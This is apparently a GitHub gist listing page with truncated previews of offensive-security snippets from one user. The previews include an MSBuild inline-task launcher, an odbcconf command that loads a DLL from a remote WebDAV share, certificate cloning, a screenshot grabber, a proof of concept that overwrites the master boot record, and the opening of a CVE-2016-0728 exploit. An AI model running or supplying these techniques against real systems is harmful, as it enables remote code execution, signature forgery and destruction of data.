I hereby claim:
- I am ahhh on github.
- I am ahhh (https://keybase.io/ahhh) on keybase.
- I have a public key whose fingerprint is 9DAC 1893 691E 8213 7040 FBCB 542C 4EE7 1926 BAE2
To claim this, I am signing this object:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
<Target Name="Hello"> | |
<SharpLauncher > | |
</SharpLauncher> | |
</Target> | |
<UsingTask | |
TaskName="SharpLauncher" | |
TaskFactory="CodeTaskFactory" |
/* | |
To use with odbcconf.exe: | |
odbcconf /S /A {REGSVR odbcconf.dll} | |
or, from a remote location (if WebDAV support enabled): | |
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll} | |
*/ | |
using System; |
# Technique taken from: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec | |
# Remeber to set your target file path to $SignThis!! | |
# Example: $SignThis = "C:\Users\user\Desktop\runme.exe"; Cert-Clone.ps1; | |
# Setup Cert Store in Reg | |
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' } | |
# Setup Cert Store on Disk | |
[system.io.directory]::CreateDirectory("C:\CertStore") | |
# Download Root Cert |
I hereby claim:
To claim this, I am signing this object:
function Get-ScreenShot | |
{ | |
[CmdletBinding()] | |
param( | |
[parameter(Mandatory = 0)] | |
[ValidateNotNullOrEmpty()] | |
[Alias('Path', 'Out', 'o')] | |
[string]$OutPath = "$env:USERPROFILE\Documents\ScreenShot", | |
#screenshot_[yyyyMMdd_HHmmss_ffff].png |
function Set-MasterBootRecord | |
{ | |
<# | |
.SYNOPSIS | |
Proof of concept code that overwrites the master boot record with the | |
message of your choice. | |
PowerSploit Function: Set-MasterBootRecord | |
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) | |
Adopted by: Ahhh (for CCDC) | |
License: BSD 3-Clause |
#!/bin/bash | |
votecounter=0 | |
derp="init_value" | |
count=0 | |
while true; do | |
derp=$"init_value" | |
derp=$(curl -s --socks5-hostname localhost:9050 http://www.imdb.com/name/nm0000206/ | grep -o "Keanu Reeves") |
#powershell -ExecutionPolicy ByPass -File ./example.ps1 | |
Set-ExecutionPolicy Unrestricted |
Get-ChildItem -Recurse -filter *.exe C:\Windows\ 2> $null | | |
ForEach-Object { Write-Host -foregroundcolor "green" "Scanning"$_.FullName $_.Name; ./yara32.exe -d filename=$_.Name your_rule.yar $_.FullName 2> $null } |
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */ | |
/* $ ./cve_2016_072 PP_KEY */ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <sys/types.h> | |
#include <keyutils.h> | |
#include <unistd.h> | |
#include <time.h> |